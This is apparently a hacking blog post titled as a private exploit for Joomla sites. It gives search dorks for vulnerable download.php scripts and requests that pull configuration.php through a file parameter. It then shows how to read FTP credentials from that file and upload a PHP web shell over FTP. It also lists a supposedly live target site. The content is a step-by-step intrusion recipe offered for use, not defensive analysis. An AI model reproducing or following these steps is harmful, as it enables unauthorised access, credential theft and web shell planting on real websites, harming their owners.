Pages

Tuesday, 26 May 2015

Priv8 Exploit Upload Shell Via FTP CMD (Joomla)

- Author: CoderSec
- Date: 25/07/2014
- Tested on : Windows

Dork:
inurl:/download.php?file=
inurl:/force-download.php?file=
Explorer ur brain
 
Get Database :
ww.site.com/download.php?file=configuration.php
ww.site.com/force-download.php?file=configuration.php
 
Find FTP User And FTP Password On Database :
var $Ftp_User : 'user'
var $Ftp_pass : 'user'
var $Ftp_root : 'public_html'
 
Upload Shell via FTP CMD
1. Open CMD
Example :
C:\Documents and Settings\USER> ftp site.com
to www.site.com
Connected to site.com
username : user
331 Password Required for example
Password : password
user Loged in
ftp> ls
public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
ftp>cd public_html
ftp> put "C:\CoderSec.php" << shell
Command Success
File Transfered
 
Shell Access :
 
www.site.com/CoderSec.php
 
Live Target :
 
http://hisardoot.co.il/ISD/knife%20..%20configuration.php
 
Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg

1 comment: